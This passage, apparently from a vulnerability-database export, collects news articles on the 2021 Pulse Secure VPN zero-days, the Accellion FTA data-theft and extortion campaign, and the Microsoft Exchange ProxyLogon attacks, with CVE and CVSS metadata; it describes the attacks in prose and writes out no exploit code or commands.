"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:00", "description": "Cybersecurity researchers from FireEye unmasked additional tactics, techniques, and procedures (TTPs) adopted by Chinese threat actors who were recently found abusing Pulse Secure VPN devices to drop malicious web shells 
and exfiltrate sensitive information from enterprise networks.\n\nFireEye's Mandiant threat intelligence team, which is tracking the cyber espionage activity under two activity clusters, UNC2630 and UNC2717, [said](<https://www.fireeye.com/blog/threat-research/2021/05/updates-on-chinese-apt-compromising-pulse-secure-vpn-devices.html>) the intrusions line up with key Chinese government priorities, adding \"many compromised organizations operate in verticals and industries aligned with Beijing's strategic objectives outlined in China's recent [14th Five Year Plan](<https://en.wikipedia.org/wiki/Five-year_plans_of_China#Fourteenth_plan_\\(2021%E2%80%932025\\)>).\"\n\nOn April 20, the cybersecurity firm [disclosed](<https://thehackernews.com/2021/04/warning-hackers-exploit-unpatched-pulse.html>) 12 different malware families, including STEADYPULSE and LOCKPICK, that have been designed with the express intent to infect Pulse Secure VPN appliances and put to use by at least two cyber espionage groups believed to be affiliated with the Chinese government.\n\n * UNC2630 - SLOWPULSE, RADIALPULSE, THINBLOOD, ATRIUM, PACEMAKER, SLIGHTPULSE, and PULSECHECK\n * UNC2717 - HARDPULSE, QUIETPULSE, and PULSEJUMP\n\nFireEye's continued investigation into the attacks as part of its incident response efforts has uncovered four more malware families deployed by UNC2630 \u2014 BLOODMINE, BLOODBANK, CLEANPULSE, and RAPIDPULSE \u2014 for purposes of harvesting credentials and sensitive system data, allowing arbitrary file execution, and removing forensic evidence.\n\nIn addition, the threat actors were also observed removing the ATRIUM and SLIGHTPULSE web shells from dozens of compromised VPN devices between April 17 and April 20 in what the researchers describe as \"unusual,\" suggesting \"this action displays an interesting concern for operational security 
and a sensitivity to publicity.\"\n\nAt the heart of these intrusions lies [CVE-2021-22893](<https://thehackernews.com/2021/05/critical-patch-out-for-month-old-pulse.html>), a recently patched vulnerability in Pulse Secure VPN devices that the adversaries exploited to gain an initial foothold on the target network. From there they stole credentials, escalated privileges, conducted internal reconnaissance and moved laterally across the network, established long-term persistent access, and accessed sensitive data.\n\n\"Both UNC2630 and UNC2717 display advanced tradecraft and go to impressive lengths to avoid detection. The actors modify file timestamps and regularly edit or delete forensic evidence such as logs, web server core dumps, and files staged for exfiltration,\" the researchers said. \"They also demonstrate a deep understanding of network appliances and advanced knowledge of a targeted network. This tradecraft can make it difficult for network defenders to establish a complete list of tools used, credentials stolen, the initial intrusion vector, or the intrusion start date.\"\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-05-28T07:29:00", "type": "thn", "title": "Chinese Cyber Espionage Hackers Continue to Target Pulse Secure VPN Devices", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": "2021-05-29T08:17:43", "id": "THN:603F844B99A1CC0CF1DE580659626B57", "href": "https://thehackernews.com/2021/05/chinese-cyber-espionage-hackers.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2021-03-23T14:28:35", "description": "Energy giant Royal Dutch Shell is the latest victim of a series of attacks on users of the Accellion legacy File Transfer Appliance (FTA) product, which has already affected numerous companies and has been [attributed](<https://threatpost.com/accellion-zero-day-attacks-clop-ransomware-fin11/164150/>) to FIN11 and the Clop ransomware 
gang.\n\n\u201cShell has been impacted by a data-security incident involving Accellion\u2019s File Transfer Appliance,\u201d the company revealed [on its website](<https://www.shell.com/energy-and-innovation/digitalisation/news-room/third-party-cyber-security-incident-impacts-shell.html>) last week. \u201cShell uses this appliance to securely transfer large data files.\u201d\n\nAttackers gained access to \u201cvarious files\u201d containing personal and company data from both Shell and some of its stakeholders, the company acknowledged. However, its core IT systems were unaffected by the breach, \u201cas the file transfer service is isolated from the rest of Shell\u2019s digital infrastructure,\u201d the company said.\n\nShell, the fifth largest company in the world, also revealed several of its global petrochemical and energy company affiliates were impacted.\n\nAccording to the company, once it learned of the incident, Shell immediately addressed the vulnerabilities with its service provider and cybersecurity team, and started an investigation to better understand the nature and extent of the incident.\n\n\u201cShell is in contact with the impacted individuals and stakeholders and we are working with them to address possible risks,\u201d the company said in a statement. \u201cWe have also been in contact with relevant regulators and authorities and will continue to do so as the investigation continues.\u201d\n\nShell did not say specifically how attackers accessed its Accellion implementation, but the breach is likely related to a series of attacks on vulnerabilities in Accellion FTA, a 20-year-old legacy product used by large corporations around the world. 
Accellion revealed that it became aware of a then-zero-day security vulnerability in the product in mid-December, and subsequently scrambled to patch it.\n\nHowever, the first flaw turned out to be just one of a cascade of now-patched zero-day bugs in the platform that Accellion discovered only after customers came under attack from cyber-adversaries well into the new year, the company acknowledged. Other victims of third-party attacks on Accellion FTA include [Jones Day Law Firm](<https://threatpost.com/stolen-jones-day-law-firm-files-posted/164066/>) and [telecom giant Singtel](<https://threatpost.com/singtel-zero-day-cyberattack/163938/>).\n\nEventually, four security vulnerabilities ([CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>), [CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>), [CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>), [CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>)) were found to be exploited in the attacks, according to the investigation. Accellion tried to patch each subsequent vulnerability as soon as it was discovered; however, as evidenced by Shell\u2019s disclosure, unpatched systems likely remain and further attacks are probable.\n\nIndeed, patching is a complicated endeavor even for the most well-run IT organizations, and many companies struggle to achieve complete coverage across their environments, observed Chris Clements, vice president of solutions architecture for cybersecurity firm [Cerberus Sentinel](<https://www.cerberussentinel.com/>), in an email to Threatpost.\n\n\u201cThis is especially true for non-Microsoft Windows based systems; the unfortunate reality is that for many organizations, their patching strategy starts and stops with Windows,\u201d he said. 
\u201cInfrastructure equipment and especially network appliances like Accellion often lag significantly in patch adoption.\u201d\n\nThere are a number of reasons why patches aren\u2019t immediately applied when they\u2019re made available, including lack of communication from vendors when patches are released, complex and manual patching processes, and organizational confusion around who\u2019s responsible for patch application, Clements added.\n\nThe Accellion attacks also once again shed light on the importance of choosing technology partners carefully when relying on them for critical digital processes that are exposed to potential exploitation, said another security expert.\n\n\u201cThe Shell data breach illustrates the criticality of securing vendors and ensuring their systems don\u2019t compromise your own business,\u201d Demi Ben-Ari, CTO and co-founder of security firm [Panorays](<https://www.panorays.com/>) said in an email to Threatpost. \u201cVulnerabilities in vendors\u2019 legacy software can serve as an easy gateway to breach data in target companies \u2014 or worse.\u201d\n
", "cvss3": {}, "published": "2021-03-23T14:16:14", "type": "threatpost", "title": "Energy Giant Shell Is Latest Victim of Accellion Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-03-23T14:16:14", "id": "THREATPOST:153B5C59C5DB1F87B3DFE2D673FA0030", "href": "https://threatpost.com/shell-victim-of-accellion-attacks/164973/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-22T18:12:09", "description": "Researchers have identified a set of threat actors (dubbed UNC2546 and UNC2582) with connections to FIN11 and the Clop ransomware gang as the cybercriminal group behind the global zero-day attacks on users of the Accellion legacy File Transfer Appliance product.\n\nMultiple Accellion FTA customers, including the [Jones Day Law Firm](<https://threatpost.com/stolen-jones-day-law-firm-files-posted/164066/>), Kroger [and Singtel](<https://threatpost.com/singtel-zero-day-cyberattack/163938/>), have all been attacked by the group, receiving extortion emails threatening to publish stolen data on the \u201cCL0P^_- LEAKS\u201d .onion website, according to an investigation from Accellion and FireEye Mandiant. 
Around 100 companies have been victims of the attack, analysts found, with around 25 suffering “significant data theft.” No ransomware was used in the attacks.

“Notably, the number of victims on the ‘CL0P^_- LEAKS’ shaming website has increased in February 2021 with organizations in the United States, Singapore, Canada and the Netherlands recently outed by these threat actors,” according to the Mandiant findings, [issued on Monday](<https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploitedfor-data-theft-and-extortion.html>).

## **4 Accellion FTA Zero-Days**

As noted, the point of entry for the attacks was Accellion FTA, a 20-year-old legacy product used by large corporations around the world. Accellion said that it became aware of a zero-day security vulnerability in FTA in mid-December, which it scrambled to patch quickly. But that turned out to be just one of a cascade of zero-days in the platform that the company discovered only after the platform came under attack from cyber-adversaries.

“This initial incident was the beginning of a concerted cyberattack on the Accellion FTA product that continued into January 2021,” the company explained. “Accellion identified additional exploits in the ensuing weeks, and rapidly developed and released patches to close each vulnerability.”

Four zero-day security holes were exploited in the attacks, according to the investigation:

 * CVE-2021-27101 – SQL injection via a crafted Host header
 * CVE-2021-27102 – OS command execution via a local web service call
 * CVE-2021-27103 – SSRF via a crafted POST request
 * CVE-2021-27104 – OS command execution via a crafted POST request

And the published victim data appears to have been stolen using a distinct “DEWMODE” web shell, according to Mandiant, which added, “The exfiltration activity has affected entities in a wide range of sectors and countries.”

## **DEWMODE Web Shell for Stealing Information**

Mandiant found that a specific web shell, which it calls DEWMODE, was used to exfiltrate data from Accellion FTA devices. The adversaries first exploited one of the zero-days, then used that access to install DEWMODE.

“Across these incidents, Mandiant observed common infrastructure usage and TTPs [tactics, techniques and procedures], including exploitation of FTA devices to deploy the DEWMODE web shell,” Mandiant determined. “A common threat actor we now track as UNC2546 was responsible for this activity. While complete details of the vulnerabilities leveraged to install DEWMODE are still being analyzed, evidence from multiple client investigations has shown multiple commonalities in UNC2546’s activities.”

The firm is still analyzing the zero-day exploitation, but it did say that in the early attacks in December, UNC2546 leveraged an SQL injection vulnerability in the Accellion FTA as its primary intrusion vector. The SQL injection was then followed by subsequent requests to additional resources.

“UNC2546 has leveraged this SQL injection vulnerability to retrieve a key which appears to be used in conjunction with a request to the file sftp_account_edit.php,” according to the analysis. “Immediately after this request, the built-in Accellion utility admin.pl was executed, resulting in an eval web shell being written to oauth.api. Almost immediately following this sequence, the DEWMODE web shell is written to the system.”

DEWMODE, once embedded, extracts a list of available files from a MySQL database on the FTA and lists those files and their corresponding metadata—file ID, path, filename, uploader and recipient—on an HTML page. UNC2546 then uses the presented list to download files through the DEWMODE web shell.

In a subset of incidents, Mandiant observed UNC2546 requesting a file named cache.js.gz – an archive that likely contained a dump of a database.

## **Extortion via Clop Leaks Site**

Once DEWMODE was installed, victims began to receive extortion emails from an actor claiming association with the Clop ransomware gang.

These are tailored to each victim and sent from a free email account to a small number of addresses at the victim organization. If the victim does not respond in a timely manner, more emails are sent, this time to hundreds or thousands of different email accounts, using varied SMTP infrastructure.

[Figure: The initial extortion note sent to victims of the Accellion FTA attacks. Source: FireEye Mandiant.]

“In at least one case, UNC2582 also sent emails to partners of the victim organization that included links to the stolen data and negotiation chat,” according to Mandiant.

The firm also found, through monitoring the CL0P^_- LEAKS shaming website, that UNC2582 has followed through on threats to publish stolen data.

“Several new victims have appeared on the site in recent weeks, including at least one organization that has publicly confirmed that their Accellion FTA device had been recently targeted,” according to Mandiant.

## **FIN11, Clop and UNC2546**

FIN11 is a financially motivated group that has been around for at least four years, conducting widespread phishing campaigns. However, it continues to evolve. It added point-of-sale (POS) malware to its arsenal in 2018; in 2019 it started conducting run-of-the-mill ransomware attacks; and it added the use of Clop ([which emerged](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clop-ransomware/>) in February 2019) [and double extortion in October](<https://threatpost.com/fin11-gang-double-extortion-ransomware/160089/>).

Mandiant has previously found that FIN11 threatened to post stolen victim data on the same .onion site used in the Accellion FTA attacks, usually in a double-extortion demand following the deployment of Clop ransomware. However, researchers found that the cybercriminals involved in these latest attacks are likely distinct from FIN11 itself, despite sharing some overlaps.

“We are currently tracking the exploitation of the zero-day Accellion FTA vulnerabilities and data theft from companies running the legacy FTA product as UNC2546, and the subsequent extortion activity as UNC2582,” according to Mandiant. “We have identified overlaps between UNC2582, UNC2546 and prior FIN11 operations, and we will continue to evaluate the relationships between these clusters of activity.”

Some of the overlaps between UNC2582’s data-theft extortion activity and prior FIN11 operations include common email senders.

“Some UNC2582 extortion emails observed in January 2021 were sent from IP addresses and/or email accounts used by FIN11 in multiple phishing campaigns between August and December 2020, including some of the last campaigns that were clearly attributable to the group,” according to the analysis.

FIN11 has also used the same CL0P^_- LEAKS shaming site and is known for deploying Clop ransomware.

“The UNC2582 extortion emails contained a link to the CL0P^_- LEAKS website and/or a victim specific negotiation page,” according to Mandiant. “The linked websites were the same ones used to support historical Clop operations, a series of ransomware and data theft extortion campaigns we suspect can be exclusively attributed to FIN11.”

When it comes to the zero-day cluster of activity, attributed to UNC2546, there are also limited overlaps with FIN11. Specifically, many of the organizations compromised by UNC2546 were previously targeted by FIN11.

And, “an IP address that communicated with a DEWMODE web shell was in the ‘Fortunix Networks L.P.’ netblock, a network frequently used by FIN11 to host download and [FRIENDSPEAK command-and-control (C2) domains](<https://threatpost.com/us-finance-sector-targeted-backdoor-campaign/152634/>).”

There’s also a connection between UNC2546 and UNC2582, the firm found: In at least one case, the UNC2546 attackers interacted with DEWMODE from a host that was used to send UNC2582-attributed extortion email.

“The overlaps between FIN11, UNC2546 and UNC2582 are compelling, but we continue to track these clusters separately while we evaluate the nature of their relationships,” Mandiant concluded. “One of the specific challenges is that the scope of the overlaps with FIN11 is limited to the later stages of the attack life cycle. UNC2546 uses a different infection vector and foothold, and unlike FIN11, we have not observed the actors expanding their presence across impacted networks.”

Also, using SQL injection to deploy DEWMODE would represent a significant shift in FIN11 TTPs, “given the group has traditionally relied on phishing campaigns as its initial infection vector and we have not previously observed them use zero-day vulnerabilities,” Mandiant added.

Threatpost article “Accellion FTA Zero-Day Attacks Tied to Clop, FIN11”, published 2021-02-22 at https://threatpost.com/accellion-zero-day-attacks-clop-ransomware-fin11/164150/. CVEs: CVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104. CVSS v2: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C).

Pulse Secure has [rushed a fix](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/SA44784/>) for a critical zero-day security vulnerability in its Connect Secure VPN devices, which has been exploited by nation-state actors to launch cyberattacks against U.S. defense, finance and government targets, as well as victims in Europe.

Pulse Secure also patched three other security bugs, two of them also critical RCE vulnerabilities.

The zero-day flaw, tracked as CVE-2021-22893, was first disclosed on April 20 and carries the highest possible CVSS severity score, 10 out of 10. An exploit allows remote code execution (RCE) and two-factor authentication bypass.
The bug [is being used in the wild](<https://threatpost.com/pulse-secure-critical-zero-day-active-exploit/165523/>) to gain administrator-level access to the appliances, according to research from Pulse Secure’s parent company, Ivanti.

It’s related to multiple use-after-free problems in Pulse Connect Secure before version 9.1R11.4, according to the advisory issued Tuesday, and “allows a remote unauthenticated attacker to execute arbitrary code via license server web services.” It can be exploited without any user interaction.

The activity level has been such that the Cybersecurity and Infrastructure Security Agency (CISA) [issued an alert](<https://cyber.dhs.gov/ed/21-03/>) warning businesses of the ongoing campaigns. These are [being tracked by FireEye Mandiant](<https://threatpost.com/pulse-secure-critical-zero-day-active-exploit/165523/>) as being carried out by two main advanced persistent threat (APT) clusters with links to China: UNC2630 and UNC2717.

In addition to the exploit for CVE-2021-22893, the campaigns involve 12 different malware families overall, Mandiant said. The malware is used for authentication bypass, for establishing backdoor access to the VPN devices, and for lateral movement.

“Nation-state hackers will forever pose a threat to businesses around the world,” Andrey Yesyev, director of cybersecurity at Accedian, said via email. “These types of attacks are almost impossible to detect and are increasingly dangerous for any organization’s sensitive data. Once hackers gain initial access to a victim’s network, they’ll move laterally in order to find valuable data. Furthermore, if they’re able to infiltrate an organization’s perimeter, bad actors could establish a connection to a command-and-control server (C2) – allowing them to control compromised systems and steal data from target networks.”

## **Additional Critical Pulse Connect VPN RCE Bugs**

Pulse Secure also rolled out fixes for three other concerning issues. Threatpost has reached out to Pulse Secure to find out whether these bugs are also being actively exploited in the wild.

The other patches are:

 * **CVE-2021-22894 (CVSS rating of 9.9):** A buffer overflow in Pulse Connect Secure Collaboration Suite before 9.1R11.4 allows remote authenticated users to execute arbitrary code as the root user via a maliciously crafted meeting room.
 * **CVE-2021-22899 (CVSS rating of 9.9):** A command-injection bug in Pulse Connect Secure before 9.1R11.4 allows remote authenticated users to perform RCE via Windows File Resource Profiles.
 * **CVE-2021-22900 (CVSS rating of 7.2):** Multiple unrestricted uploads in Pulse Connect Secure before 9.1R11.4 allow an authenticated administrator to perform a file write via a maliciously crafted archive upload in the administrator web interface.

## **Pulse Secure: A Cyberattacker’s Favorite**

Pulse Secure appliances have been in the sights of APTs for months, with ongoing nation-state attacks using the bug tracked as CVE-2019-11510. It allows unauthenticated remote attackers to send a specially crafted URI to carry out arbitrary file reading – perfect for espionage efforts.

Here’s a rundown of recent activity:

 * **April:** [The FBI warned](<https://threatpost.com/nsa-security-bugs-active-nation-state-cyberattack/165446/>) that a known arbitrary file-read Pulse Secure bug (CVE-2019-11510) was part of five vulnerabilities under attack by the Russia-linked group known as APT29 (a.k.a. Cozy Bear or The Dukes). APT29 is conducting “widespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials to allow further access,” according to the Feds.
 * **April:** The Department of Homeland Security (DHS) urged companies that use Pulse Secure VPNs to change their passwords for Active Directory accounts, because in many cases attackers have already exploited CVE-2019-11510 to hoover up victims’ credentials – and are now using those credentials to move laterally through organizations, [DHS warned](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>).
 * **October:** CISA said that a federal agency had suffered a successful espionage-related cyberattack that led to a backdoor and multistage malware being dropped on its network. Once again, [CVE-2019-11510 was in play](<https://threatpost.com/feds-cyberattack-data-stolen/159541/>), used to gain access to employees’ legitimate Microsoft Office 365 log-in credentials and sign into an agency computer remotely.

To stay safe, Accedian’s Yesyev suggested monitoring east-west traffic to detect these types of intrusions.

“And in order to detect C2 communications, it’s important to have visibility into network communication patterns,” he added. “This is yet another instance that proves the benefits of a layered security model. In addition to adopting network-based threat detection and user/endpoint behavior analytics solutions, security must be designed into the DevOps cycle. These technologies and processes help organizations understand communication patterns and destinations to help identify C2 tunnels…allowing teams to identify stealthy lateral movements and ultimately protect data from being stolen.”

Threatpost article “Pulse Secure VPNs Get a Fix for Critical Zero-Day Bugs”, published 2021-05-04 at https://threatpost.com/pulse-secure-vpns-fix-critical-zero-day-bugs/165850/. CVEs: CVE-2019-11510, CVE-2021-22893, CVE-2021-22894, CVE-2021-22899, CVE-2021-22900. CVSS v2: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P).

Hot on the heels of Microsoft’s announcement about active cyber-espionage campaigns that are [exploiting four serious security vulnerabilities](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in Microsoft Exchange Server, the U.S. government is mandating patching for the issues.

The news comes as security firms report escalating numbers of related campaigns led by sophisticated adversaries against a range of high-value targets, especially in the U.S.

The Cybersecurity and Infrastructure Security Agency (CISA) has issued an emergency directive, warning that its partners have observed active exploitation of the bugs in Microsoft Exchange on-premises products, which allow attackers to have “persistent system access and control of an enterprise network.”

“CISA has determined that this exploitation of Microsoft Exchange on-premises products poses an unacceptable risk to Federal Civilian Executive Branch agencies and requires emergency action,” reads the [March 3 alert](<https://cyber.dhs.gov/ed/21-02/>).
“This determination is based on the current exploitation of these vulnerabilities in the wild, the likelihood of the vulnerabilities being exploited, the prevalence of the affected software in the federal enterprise, the high potential for a compromise of agency information systems and the potential impact of a successful compromise.”

## **Rapidly Spreading Exchange Server Attacks**

Earlier this week Microsoft said that it had spotted multiple zero-day exploits in the wild being used to attack on-premises versions of Microsoft Exchange Server, spurring it to release [out-of-band patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>).

The exploited bugs are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065. When chained together, they allow remote authentication bypass and remote code execution. Adversaries have been able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access, according to the computing giant.

The attacks are being carried out in part by a China-linked advanced persistent threat (APT) called Hafnium, Microsoft said – but multiple other security firms have observed attacks from other groups and against a widespread swathe of targets.

Researchers at Huntress Labs, for instance, told Threatpost that they have discovered more than 200 web shells deployed across thousands of vulnerable servers (with antivirus and endpoint detection/recovery installed), and the firm expects this number to keep rising.

“The team is seeing organizations of all shapes and sizes affected, including electricity companies, local/county governments, healthcare providers and banks/financial institutions, as well as small hotels, multiple senior citizen communities and other mid-market businesses,” a spokesperson at Huntress told Threatpost.

Meanwhile, researchers at ESET tweeted that CVE-2021-26855 was being actively exploited in the wild by at least three APTs besides Hafnium.

“Among them, we identified #LuckyMouse, #Tick, #Calypso and a few additional yet-unclassified clusters,” it tweeted, adding that while most attacks are against targets in the U.S., “we’ve seen attacks against servers in Europe, Asia and the Middle East.”

> Most targets are located in the US but we’ve seen attacks against servers in Europe, Asia and the Middle East. Targeted verticals include governments, law firms, private companies and medical facilities. 3/5 [pic.twitter.com/kwxjYPeMlm](<https://t.co/kwxjYPeMlm>)
>
> — ESET research (@ESETresearch) [March 2, 2021](<https://twitter.com/ESETresearch/status/1366862951156695047?ref_src=twsrc%5Etfw>)

The vulnerabilities only exist in on-premises versions of Exchange Server, and don’t affect Office 365 and virtual instances. Yet despite the move to the cloud, there are plenty of physical servers still in service, leaving a wide pool of targets.

“With organizations migrating to Microsoft Office 365 en masse over the last few years, it’s easy to forget that on-premises Exchange servers are still in service,” Saryu Nayyar, CEO of Gurucul, said via email. “Some organizations, notably in government, can’t migrate their applications to the cloud due to policy or regulation, which means we will see on-premises servers for some time to come.”

## **CISA Mandates Patching Exchange Servers**

CISA is requiring federal agencies to take several steps in light of the spreading attacks.

First, they should take a thorough inventory of all on-premises Microsoft Exchange Servers in their environments, and then perform forensics to identify any existing compromises. Any compromises must be reported to CISA for remediation.

The forensics step would include collecting “system memory, system web logs, windows event logs and all registry hives. Agencies shall then examine the artifacts for indications of compromise or anomalous behavior, such as credential dumping and other activities.”

If no indicators of compromise have been found, agencies must immediately patch, CISA added. And if agencies can’t immediately patch, then they must take their Microsoft Exchange Servers offline.

All agencies have also been told to submit an initial report by Friday on their current situation.

“[This] highlights the increasing frequency of attacks orchestrated by nation states,” said Steve Forbes, government cybersecurity expert at Nominet, via email. “The increasing role of government agencies in leading a coordinated response against attacks. CISA’s directive for agencies to report back on their level of exposure, apply security fixes or disconnect the program is the latest in a series of increasingly regular emergency directives that the agency has issued since it was established two years ago. Vulnerabilities like these demonstrate the necessity for these coordinated national protective measures to efficiently and effectively mitigate the effects of attacks that could have major national security implications.”

Threatpost article “CISA Orders Fed Agencies to Patch Exchange Servers”, published 2021-03-04 at https://threatpost.com/cisa-federal-agencies-patch-exchange-servers/164499/. CVEs: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065.

Cryptojacking can be added to the list of threats that face any [unpatched Exchange servers](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) that remain vulnerable to the now-infamous ProxyLogon exploit, new research has found.

Researchers discovered threat actors using Exchange servers compromised via the highly publicized exploit chain—which has suffered a [barrage of attacks](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) from advanced persistent threat (APT) groups to infect systems with everything from [ransomware](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>) to webshells—to host Monero cryptomining malware, according to [a report](<https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/>) posted online this week by SophosLabs.

“An unknown attacker has been attempting to leverage what’s now known as the ProxyLogon exploit to foist a malicious Monero cryptominer onto Exchange servers, with the payload being hosted on a compromised Exchange server,” Sophos principal researcher Andrew Brandt wrote in the report.

Researchers were inspecting telemetry when they discovered what they deemed an “unusual attack” targeting a customer’s Exchange server. Sophos researchers Fraser Howard and Simon Porter were instrumental in the discovery and analysis of the novel threat, Brandt acknowledged.

Researchers said they detected the executables associated with this attack as Mal/Inject-GV and XMR-Stak Miner (PUA), according to the report. They published a list of [indicators of compromise](<https://github.com/sophoslabs/IoCs/blob/master/PUA-QuickCPU_xmr-stak.csv>) on the SophosLabs GitHub page to help organizations recognize if they’ve been attacked in this way.

## **How It Works**

The attack as observed by researchers began with a PowerShell command to retrieve a file named win_r.zip from another compromised server’s Outlook Web Access logon path (/owa/auth), according to the report.
Under closer inspection, the .zip file was not a compressed archive at all but a batch script, which then invoked the built-into-Windows certutil.exe program to download two additional files, win_s.zip and win_d.zip, which also were not compressed.

The first file is written out to the filesystem as QuickCPU.b64, an executable payload in base64 that can be decoded by the certutil application, which by design can decode base64-encoded security certificates, researchers observed.

The batch script then runs another command that outputs the decoded executable into the same directory. Once decoded, the batch script runs the executable, which extracts the miner and configuration data from the QuickCPU.dat file, injects it into a system process, and then deletes any evidence that it was there, according to the report.

The executable in the attack appears to contain a modified version of a tool publicly available on GitHub called PEx64-Injector, which is [described](<https://github.com/0xyg3n/PEx64-Injector>) on its GitHub page as having the ability to “migrate any x64 exe to any x64 process” with “no administrator privileges required,” according to the report.

Once the file runs on an infected system, it extracts the contents of the QuickCPU.dat file, which includes an installer for the cryptominer and its configuration, temporarily to the filesystem. It then configures the miner, injects it into a running process, then quits, according to the report. “The batch file then deletes the evidence and the miner remains running in memory, injected into a process already running on the system,” Brandt wrote.

Researchers observed the cryptominer receiving funds on March 9, which is when Microsoft also released updates to Exchange to patch the flaws. Though the attacker lost several servers after this date and the output from the miner decreased, other servers that were gained thereafter more than made up for the early losses, according to the report.

## **Exploit-Chain History**

The ProxyLogon problem started for Microsoft in early March when the company said it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange Server. The exploit chain is comprised of four flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065).

Together the flaws created a pre-authentication remote code execution (RCE) exploit, meaning attackers can take over servers without knowing any valid account credentials. This gave them access to email communications and the opportunity to install a web shell for further exploitation within the environment.

As previously mentioned, Microsoft released an out-of-band update [soon after](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in its scramble to patch the flaws in the ProxyLogon chain; however, while the company boasted later that month that 92 percent of affected machines had already been patched, much damage had already been done, and unpatched systems likely exist that remain vulnerable.

Threatpost article “Attackers Target ProxyLogon Exploit to Install Cryptojacker”, published 2021-04-15 at https://threatpost.com/attackers-target-proxylogon-cryptojacker/165418/. CVEs: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065. CVSS v2: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P).

Recently patched Microsoft Exchange vulnerabilities are under fire from at least 10 different advanced persistent threat (APT) groups, all bent on compromising email servers around the world. Overall exploitation activity is snowballing, according to researchers.

Microsoft said in early March that it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange Server. Four flaws can be chained together to create a pre-authentication remote code execution (RCE) exploit – meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a webshell for further exploitation within the environment.

And indeed, adversaries from the Chinese APT known as Hafnium were able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access, according to the computing giant.

Microsoft was spurred to release [out-of-band patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) for the exploited bugs, known collectively as ProxyLogon, which are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.

## **Rapidly Spreading Email Server Attacks**

Microsoft said last week that the attacks were “limited and targeted.” But that’s certainly no longer the case. Other security companies have [continued to say](<https://twitter.com/0xDUDE/status/1369302347617349642>) they have seen much broader, escalating activity, with mass numbers of servers being scanned and attacked.

ESET researchers [had confirmed this](<https://threatpost.com/cisa-federal-agencies-patch-exchange-servers/164499/>) as well, and on Wednesday announced that they had pinpointed at least 10 APTs going after the bugs, including Calypso, LuckyMouse, Tick and Winnti Group.

“On Feb. 28, we noticed that the vulnerabilities were used by other threat actors, starting with Tick and quickly joined by LuckyMouse, Calypso and the Winnti Group,” according to [the writeup](<https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/>).
